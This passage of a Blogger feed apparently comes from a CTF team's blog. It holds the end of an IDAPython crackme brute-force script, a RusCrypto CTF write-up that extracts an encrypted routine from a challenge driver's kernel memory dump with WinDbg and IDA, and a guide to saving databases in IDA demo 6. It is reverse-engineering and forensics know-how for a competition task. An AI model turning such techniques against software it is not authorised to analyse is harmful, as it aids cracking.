<span class="kw1">print</span> <span class="kw2">hex</span><span class="br0">(</span>i<span class="br0">)</span> + <span class="st0">" '"</span> + strOld<span class="br0">[</span>i<span class="br0">]</span> + <span class="st0">"' "</span> + <span class="kw2">hex</span><span class="br0">(</span><span class="kw2">ord</span><span class="br0">(</span>strOld<span class="br0">[</span>i<span class="br0">]</span><span class="br0">)</span><span class="br0">)</span> + <span class="st0">" --> "</span> + <span class="kw2">hex</span><span class="br0">(</span> val <span class="br0">)</span><br />
start = <span class="st0">"%x"</span> <span class="sy0">%</span> val<br />
outstr += strOld<span class="br0">[</span>i<span class="br0">]</span><br />
<span class="kw1">break</span><br />
<span class="kw1">print</span> outstr</div><br />
I get a string like <b>h2 h2h2 h2</b>. reverse it to 2h 2h2h 2h and put in program input - get a 50%.<br />
Then if you want to check possible variants you need a construction like this. (val_4d = 0x40317E)<br />
<div class="python">brute = Appcall.proto("brute_f", "int __cdecl brute_f();")<br />
PutDataList<span class="br0">(</span> LocByName<span class="br0">(</span><span class="st0">'string'</span><span class="br0">)</span>, b<span class="br0">)</span><br />
brute<span class="br0">(</span><span class="br0">)</span><br />
<span class="kw1">if</span> <span class="br0">(</span>Dword<span class="br0">(</span>LocByName<span class="br0">(</span><span class="st0">"val_4d"</span><span class="br0">)</span><span class="br0">)</span><span class="br0">)</span> == 0xd4:<br />
print "OK"</div><br />
Thank you for attention. Have a nice CTFs with IDApython.</div></span>Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com0tag:blogger.com,1999:blog-5377378398297854379.post-79991729187649135052011-03-18T08:01:00.000-07:002011-04-13T03:49:11.718-07:00RusCryptoCTF T4 Task<div dir="ltr" style="text-align: left;" trbidi="on"><br />
Lets show you decision of T4 RusCrypto task from Ufologists.<br />
<br />
<blockquote><span style="color: #38761d;"><span style="font-family: "Georgia","Times New Roman",serif;"><i>We were given an access to the box on which key container was running. It was uploaded not long ago by third party developer. Container search ended with BSOD with help of antirootkit and antiviruse. Analyze the dump and find the key in root of OS.</i></span></span></blockquote><blockquote><span style="color: #38761d;"><span style="font-family: "Georgia","Times New Roman",serif;"><i>P.S.</i></span></span><span style="color: #38761d;"><span style="font-family: "Georgia","Times New Roman",serif;"><i>We know for sure that flag contains only latin symbols. download file</i></span></span></blockquote><br />
First of all unzip it.And get memory dump. Put it in to WinDbg.<br />
<br />
Let's start<br />
<span style="color: #444444;"><b><span style="font-family: "Georgia","Times New Roman",serif;"><span class="Apple-style-span" style="background-color: white;">kd></span><span class="Apple-style-span" style="background-color: white;">!analise -v</span></span></b></span><br />
<blockquote><span class="Apple-style-span" style="font-size: x-small;">WARNING: Stack unwind information not available. Following frames may be wrong.</span><br />
<span class="Apple-style-span" style="font-size: x-small;">989e9c58 8a267f44 badb0d00 00000000 00000801 nt!Kei386EoiHelper+0x291c</span><br />
<span class="Apple-style-span" style="font-size: x-small;">989e9ce4 81a2aa31 00000004 00000d54 00000000 klif+0xdf44</span><br />
<span class="Apple-style-span" style="font-size: x-small;">989e9d54 81a2b2ff 00000000 00000000 8d41f348 nt!IoSetIoCompletion+0x3bd</span><br />
<span class="Apple-style-span" style="font-size: x-small;">989e9d74 819f1a2d 8d41f348 00000000 00000001 nt!IoSetIoCompletion+0xc8b</span><br />
<span class="Apple-style-span" style="font-size: x-small;">989e9dc0 8184aa3e 905f5973 83d2e8a0 00000000 nt!RtlDestroyAtomTable+0x50f</span><br />
<span class="Apple-style-span" style="font-size: x-small;">00000000 00000000 00000000 00000000 00000000 nt!RtlSubAuthorityCountSid+0x3c4</span></blockquote>Something crazy and Unknown. Lets Google driver name klif.<br />
It's Antivirus. Remember that Memdump was made with Antivirus and antirootkit.<br />
Ok. Let's see all drivers in system.<br />
<span class="fullpost"><br />
<span style="font-family: "Georgia","Times New Roman",serif;"><b><span style="color: #444444;">kd> lm oft</span></b></span><br />
(It's last drivers)<br />
<blockquote><span style="font-size: x-small;">905de000 905e1d00 Dbgv \??\C:\Windows\system32\Drivers\Dbgv.sys Sat May 17 19:18:56 2008 (482EF760)</span><span style="font-size: x-small;"><br />
</span><br />
<span style="font-size: x-small;">905e2000 905f0000 atapi32 \??\C:\Windows\System32\drivers\atapi32.sys Wed Mar 09 23:33:41 2011 (4D77E425)</span><br />
<span style="font-size: x-small;">905f0000 905f8700 Normandy \SystemRoot\System32\Drivers\Normandy.SYS Fri Apr 30 08:00:34 2010 (4BDA55E2)</span><br />
<span style="font-size: x-small;">93c10000 93e11000 win32k \SystemRoot\System32\win32k.sys Sat Jan 19 08:36:46 2008 (47918C6E)</span><br />
<span style="font-size: x-small;">93e20000 93e37000 dxg \SystemRoot\System32\drivers\dxg.sys Sat Jan 19 08:36:11 2008 (47918C4B)</span><br />
<span style="font-size: x-small;">93e50000 93e59000 TSDDD \SystemRoot\System32\TSDDD.dll Sat Jan 19 09:01:09 2008 (47919225)</span><br />
<span style="font-size: x-small;">93ea0000 93ec8a80 vmx_fb \SystemRoot\System32\vmx_fb.dll Fri Oct 03 22:41:58 2008 (48E66776)</span></blockquote>One of them was developed in 2011.And one in 2010. All another drivers there are in Vista.<br />
Google Normandy.sys -> It's RkU. (antirootkit)<br />
<br />
Let's analyze driver.<br />
<span style="font-family: "Georgia","Times New Roman",serif;"><span style="color: #444444;"><b>kd> !dh 905e2000</b></span></span><br />
<blockquote><span class="Apple-style-span" style="font-size: x-small;">Debug Directories(1)</span><br />
<span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>Type Size Address Pointer</span><br />
<span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-tab-span" style="white-space: pre;"> </span>cv 70 acb8 98b8<span class="Apple-tab-span" style="white-space: pre;"> </span>Format: RSDS, guid, 1, d:\develop\my_project\ruscryptotask\driver\ruscrypto\objfre_win7_x86\i386\Ruscrypto.pdb</span></blockquote>Sure it's some task for RusCrypto.<br />
Get file from memory.<br />
<span style="color: #444444;"><b><span style="font-family: "Georgia","Times New Roman",serif;">kd> .writemem d:\dumpnt.exe 0x905e2000 L?E000</span></b></span><br />
<br />
OK. Add it to IDA. Base program on 905e2000.<br />
<br />
Remember that driver unloads init section. So DriverEntry we can't find.<br />
Find a peaces of code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRstAkbE5wjxhGapCg2gvbzmfai6Q-q0_xaoBWbjLPg6kbf2eBlK-v33wK7bCN7J6QdM6OdMiikvrnDpNoUXteThBNbSIOsMQq_MXD_WRVsXlE-xdot1p5viyXjcTzolJS193sLk1i7DE/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="20" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRstAkbE5wjxhGapCg2gvbzmfai6Q-q0_xaoBWbjLPg6kbf2eBlK-v33wK7bCN7J6QdM6OdMiikvrnDpNoUXteThBNbSIOsMQq_MXD_WRVsXlE-xdot1p5viyXjcTzolJS193sLk1i7DE/s400/Capture.JPG" width="400" /></a></div><br />
IDA colored code. Push 'P' to make function.<br />
Let's analyze imported functions. IDA knows about .idata section. So all imported functions are red.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioSuR2zCI5AHR5GNXM0kMgqjDqXenS9Aqb6IB7eecwwTnqDgiUfgbiyZMCp6J7fdvJsrgVj-U31_Q70_RA6sEvBRi-eRMpFfIkQbSGD2sfZy_XjcIrqqqx2HwOupT4iJ1M2dKxVwjKajY/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEioSuR2zCI5AHR5GNXM0kMgqjDqXenS9Aqb6IB7eecwwTnqDgiUfgbiyZMCp6J7fdvJsrgVj-U31_Q70_RA6sEvBRi-eRMpFfIkQbSGD2sfZy_XjcIrqqqx2HwOupT4iJ1M2dKxVwjKajY/s1600/Capture.JPG" /></a></div><br />
Imported function are<br />
<span class="Apple-style-span" style="font-size: x-small;"> </span><br />
<blockquote><span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4000 extrn unk_905E4000 ; CODE XREF: sub_905E4422+712 p</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4000 ; DATA XREF: sub_905E4422+712 r</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4004 extrn unk_905E4004 ; CODE XREF: sub_905E4422+70B p</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4004 ; DATA XREF: sub_905E4422+70B r</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4008 extrn unk_905E4008 ; CODE XREF: sub_905E4422+6FC p</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4008 ; DATA XREF: sub_905E4422+6FC r</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E400C extrn unk_905E400C ; CODE XREF: sub_905E4422+22 p</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E400C ; DATA XREF: sub_905E4422+22 r</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4010</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4014 extrn unk_905E4014 ; CODE XREF: .rdata:905E4BAA p</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4014 ; DATA XREF: .rdata:905E4BAA r</span><br />
<span class="Apple-style-span" style="font-size: xx-small;">.idata:905E4018 extrn unk_905E4018 ; DATA XREF: sub_905E4BB6 r</span></blockquote>Analyze all funcrions with Windbg.<br />
<br />
<b><span style="color: #444444;"><span style="font-family: "Georgia","Times New Roman",serif;">kd>u poi(905E4000) </span></span></b>and rename in IDA.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzeK_nu76PUgbxZp96JI1VdyZCISyLniLHRJkTJsCZOdvNNi7DnrQ3gSHqHOqoYxe1PS2J6cX2O0YHCMnJHjtc3bB7xjQXuuduyj75pKmFld9kykbxVdLBCRLikkobQ_xubY2lda-RUE/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLzeK_nu76PUgbxZp96JI1VdyZCISyLniLHRJkTJsCZOdvNNi7DnrQ3gSHqHOqoYxe1PS2J6cX2O0YHCMnJHjtc3bB7xjQXuuduyj75pKmFld9kykbxVdLBCRLikkobQ_xubY2lda-RUE/s1600/Capture.JPG" /></a></div><br />
Now Import looks like:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik_wDYgAyfbMUstvbHQVHpKOC8P2-91uAJMT2y-GR05e4JsRyOKvQYRGEs9E5Bcr1Qh-6mZPBCmmd9q-PMprluf-1U4X4-5_En_sSAEwFw4g1YV4MO6esx6V9LuJtbCoj8AWzEY6KYojQ/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEik_wDYgAyfbMUstvbHQVHpKOC8P2-91uAJMT2y-GR05e4JsRyOKvQYRGEs9E5Bcr1Qh-6mZPBCmmd9q-PMprluf-1U4X4-5_En_sSAEwFw4g1YV4MO6esx6V9LuJtbCoj8AWzEY6KYojQ/s400/Capture.JPG" width="400" /></a></div><br />
More comfortable. And. Driver allocates pool and didn't Free it.<br />
Another interesting things is MmProtectMdlSystemAddress function.<br />
<br />
<pre class="libCScode" id="ctl00_contentContainer_ctl01_code" space="preserve" style="background-attachment: initial; background-clip: initial; background-color: #dddddd; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-top-color: rgb(200, 205, 222); border-top-style: solid; border-top-width: 1px; color: #000066; display: block; font-family: 'Courier New', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 0px; overflow-x: hidden; overflow-y: hidden; padding-left: 5px; padding-right: 5px; padding-top: 5px; white-space: pre-wrap; word-wrap: break-word;"><span class="Apple-style-span" style="font-family: "Segoe UI","Verdana","Arial"; font-size: 11px;"><code>NTSTATUS MmProtectMdlSystemAddress(
__in PMDLX MemoryDescriptorList,
__in ULONG NewProtect </code></span><span class="Apple-style-span" style="color: #000066; font-family: monospace; font-size: 12px; white-space: pre-wrap;">);</span></pre>Push add symbolic constant and find READ_EXECUTE. Now peace of code is<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGsD9jCxo50bs4oYS7sZLSq39ZGtIacfHochRBx2sylbbT545IkvaXf4zPynBp9TBqdGu0AgGhsLycYqlG6Q0_7pYe5uM-3Lfv1zEPEKdvdYKEIT1xWBCPWt1sY-T3LzYr6GDSUDrOihY/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGsD9jCxo50bs4oYS7sZLSq39ZGtIacfHochRBx2sylbbT545IkvaXf4zPynBp9TBqdGu0AgGhsLycYqlG6Q0_7pYe5uM-3Lfv1zEPEKdvdYKEIT1xWBCPWt1sY-T3LzYr6GDSUDrOihY/s1600/Capture.JPG" /></a></div><br />
Driver make Mdl from memory [ebp-80h] + 0x236, then Protect in as EXECUTE. And Call it later.<br />
Interesting pool. How we can find it. Lets see another function for memory.<br />
<br />
<pre class="libCScode" id="ctl00_contentContainer_ctl01_code" space="preserve" style="background-attachment: initial; background-clip: initial; background-color: #dddddd; background-image: initial; background-origin: initial; background-position: initial initial; background-repeat: initial initial; border-top-color: rgb(200, 205, 222); border-top-style: solid; border-top-width: 1px; color: #000066; display: block; font-family: 'Courier New', Verdana, Arial, Helvetica, sans-serif; font-size: 12px; margin-bottom: 10px; margin-left: 0px; margin-right: 0px; margin-top: 0px; overflow-x: hidden; overflow-y: hidden; padding-left: 5px; padding-right: 5px; padding-top: 5px; white-space: pre-wrap; word-wrap: break-word;"><code>PVOID ExAllocatePoolWithTag(
__in POOL_TYPE PoolType,
__in SIZE_T NumberOfBytes,
__in ULONG Tag
);</code></pre><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR4EWgOP8L_5_w4k2fa8IHp0g0Ld6y6bhX84vZ8B_WwVliqHCZLnjv1B9svn6tt-vUfCCrFwwC7KCs1t6_-oqH5wQHdPLod7uHXZubkphRF1c9RQSGUQvC_eWBG-EOPKF8Jx-BjpiEUmg/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiR4EWgOP8L_5_w4k2fa8IHp0g0Ld6y6bhX84vZ8B_WwVliqHCZLnjv1B9svn6tt-vUfCCrFwwC7KCs1t6_-oqH5wQHdPLod7uHXZubkphRF1c9RQSGUQvC_eWBG-EOPKF8Jx-BjpiEUmg/s1600/Capture.JPG" /></a></div><br />
<br />
Now we sure, that driver allocate this pool and put pointer to [ebp-80h].<br />
We need to find this pool in memory, but pointer was in stack and driver lose it...<br />
System don't lose it and we can find pool by TAG.<br />
<br />
Params of ExAllocatePoolWithTag is<br />
<br />
<blockquote>PoolType [in]<br />
Specifies the type of pool memory to allocate. For a description of the available pool memory types, see <a href="http://msdn.microsoft.com/en-us/library/ff559707%28VS.85%29.aspx">POOL_TYPE.</a><br />
<br />
NumberOfBytes [in]<br />
Specifies the number of bytes to allocate.<br />
<br />
Tag [in]<br />
Specifies the pool tag for the allocated memory. Specify the pool tag as a character literal of up to four characters delimited by single quotation marks (for example, 'Tag1'). The string is usually specified in <b>reverse order</b> (for example, '1gaT'). The ASCII value of each character in the tag must be between 0 and 127. Each allocation code path should use a unique pool tag to help debuggers and verifiers identify the code path.</blockquote><br />
Reverse string order. So 0x4D646Ch is 'Mdl', reverse it 'ldM'.Windbg again.<br />
<span style="font-family: "Georgia","Times New Roman",serif;"><b><span style="color: #444444;">kd>!poolfind ldM</span></b></span><br />
<br />
Nothing. Let's see all pools.<br />
<b><span style="font-family: "Georgia","Times New Roman",serif;"><span style="color: #444444;">kd>!poolused</span></span></b><br />
<br />
If you get error add <span class="Apple-style-span" style="color: blue; font-family: "tahoma","arial",sans-serif; font-size: 13px;">c:\symserver;SRV*c:\symserver*http://msdl.microsoft.com/download/symbols </span>to symbol path.<br />
Sure ldM is exist.<br />
<blockquote>ldM. 1 576 0 0<span class="Apple-tab-span" style="white-space: pre;"> </span>UNKNOWN pooltag ' ldM', please update pooltag.txt</blockquote>Size 576 is 240 in hex. We allocate 0x238. 8 bytes it's header.<br />
Another way to get pool is <span style="font-family: "Georgia","Times New Roman",serif;"><span style="color: #444444;"><b>kd>!poolfind 0x004D646C</b></span></span><br />
Again fail. Lets<br />
<b><span style="color: #444444;"><span style="font-family: "Georgia","Times New Roman",serif;">kd>!poolfind 0x004D646C 0</span></span></b><br />
<br />
<blockquote>8d4a9a60 size: 240 previous size: 30 (Allocated) ldM.</blockquote><br />
Ok. We find a pool. Dump it.<br />
<span style="color: #444444;"><b><span style="font-family: "Georgia","Times New Roman",serif;">kd> .writemem d:\dumpnt2.exe 0x8d4a9a60 L?240</span></b></span><br />
<br />
First 8 bytes is header. All another is code. Put it in IDA.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXdHTudfoJRC4pDdJd4n0VFE9BvdsZbgTUr06Xe0cb4fxCf49NyG-FYjhKt2I9wlIdqbdO7pQkF0n8pztF-xO2Zcl5tvl4BAUSQXQgEdgVnCcQoMNKiUcVwGYdObGTYDax02jwSef53t8/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXdHTudfoJRC4pDdJd4n0VFE9BvdsZbgTUr06Xe0cb4fxCf49NyG-FYjhKt2I9wlIdqbdO7pQkF0n8pztF-xO2Zcl5tvl4BAUSQXQgEdgVnCcQoMNKiUcVwGYdObGTYDax02jwSef53t8/s1600/Capture.JPG" /></a></div><br />
Inline Function without any import and with some data on stack. Execute it with IDA and Bochs.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrms4u2Ivc3Y9A27pNHbi5oNt3dPQmBI4XvbFIeTtdVE6A3TLUV5gRW1LYprQNSYS6JQC0YV3j7tcfw1tnv4r3h6IFGNA4UHLZO1WS0_cEstd6gsYAhI8KUw1cOBaLPcZTUhU9usPx_8k/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgrms4u2Ivc3Y9A27pNHbi5oNt3dPQmBI4XvbFIeTtdVE6A3TLUV5gRW1LYprQNSYS6JQC0YV3j7tcfw1tnv4r3h6IFGNA4UHLZO1WS0_cEstd6gsYAhI8KUw1cOBaLPcZTUhU9usPx_8k/s1600/Capture.JPG" /></a></div><br />
Here is answer.<br />
<br />
P.S. Encryption in binary was DES. Encryptoin in pool was xtea. </div></span>Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com0tag:blogger.com,1999:blog-5377378398297854379.post-21156358488121745442011-02-21T13:03:00.000-08:002011-04-13T03:50:23.868-07:00Saving db in IDA demo 6<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">As you know new free version of IDA can't save databases. For some purposes this version is enough, but some times we need to save info. So I will show how you can save IDA db to sqlite.</span><br />
<div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><span class="fullpost"><br />
<div dir="ltr" style="text-align: left;" trbidi="on"><ol style="text-align: left;"><li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Download and install <a href="http://www.hex-rays.com/idapro/idadowndemo.htm" style="background-color: white;"><span class="Apple-style-span" style="color: #674ea7;">IDA demo 6</span></a><span class="Apple-style-span" style="color: #351c75;">.</span></span></li>
<li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="color: #351c75;"></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Get a <a href="http://code.google.com/p/idapython/"><span class="Apple-style-span" style="color: #674ea7;">IDApython</span></a> with IDA 6 support.</span></li>
<li><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><a href="http://code.google.com/p/mynav/"><span class="Apple-style-span" style="color: #674ea7;">MyNav</span></a>. </span></li>
</ol></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">After installing all stuff and starting IDA you will see this window. </span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3salfnUarfDAZtshC5bLB8fTlcgCnxy4_mhyphenhyphenlywJl6Y5j5hlSIObXzSsrXa0aH20VNfhJOCF2H0A6sEI_aIrhhLS3vCqhtjdR2FjfaZAOqwaO3hofZZRmzvAjU5eSTOUK4ZgTjd26ZuU/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><img border="0" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3salfnUarfDAZtshC5bLB8fTlcgCnxy4_mhyphenhyphenlywJl6Y5j5hlSIObXzSsrXa0aH20VNfhJOCF2H0A6sEI_aIrhhLS3vCqhtjdR2FjfaZAOqwaO3hofZZRmzvAjU5eSTOUK4ZgTjd26ZuU/s200/Capture.JPG" width="200" /></span></a></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">IDA demo doesn't export PLUGIN_ENTRY. idaapi.add_menu_item(<i>"Edit/Plugins/"</i> ... doesn't work.</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Before starting mynav.py script it's necessary to replace strings in <i><u>registerMenus </u></i>function from <i><span class="Apple-style-span" style="color: red;">"Edit/Plugins/"</span></i> to<i> <span class="Apple-style-span" style="color: #38761d;">"Edit/Other/"</span></i>. So all MyNav stuff will be able in Other directory.</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Rigth now all you need it's choosing <i>"Edit/Other/MyNav: Advanced utilities</i>" </span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKKYJoswqfzMl0c-pNR_Dh-EDnAV0k5N9UMRZVR6EJSLU7xm8RKPwj9YIz5CngrbylnX10wYsOZkEhYMMBog0k-f1PSqsyZ3VGyyJXzwrd_Bzcj_Nt-o4Rfbj9fVweCB7uU34ftr2F-Q8/s1600/Capture.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><img border="0" height="139" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhKKYJoswqfzMl0c-pNR_Dh-EDnAV0k5N9UMRZVR6EJSLU7xm8RKPwj9YIz5CngrbylnX10wYsOZkEhYMMBog0k-f1PSqsyZ3VGyyJXzwrd_Bzcj_Nt-o4Rfbj9fVweCB7uU34ftr2F-Q8/s320/Capture.JPG" width="320" /></span></a></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">And save current session to DB. Example of saving database available on <span class="Apple-style-span" style="background-color: white;"><a href="http://joxeankoret.com/video/exportimport.htm"><span class="Apple-style-span" style="color: #351c75;">joxeankoret </span></a></span>web site.</span></div></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br />
</span></div><div><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">P.S. Russian version is able in <a href="http://ufoctf.ru/ufoblog/396/"><span class="Apple-style-span" style="color: #351c75;">UFOCTF</span></a>.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">P.S.P.S. Add Gdb plugin from IDA 5.5 and they works on IDA 6. Also IdaStealth works and exists in "edit/plugins/" directory.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">P.S.P.S. Actually it makes the same as saving db to IDC. Will combinate it with <a href="http://dkbza.org/ida2sql.html">ida2sql</a>.</span></div></div></span>Anonymoushttp://www.blogger.com/profile/11822439249066904087noreply@blogger.com0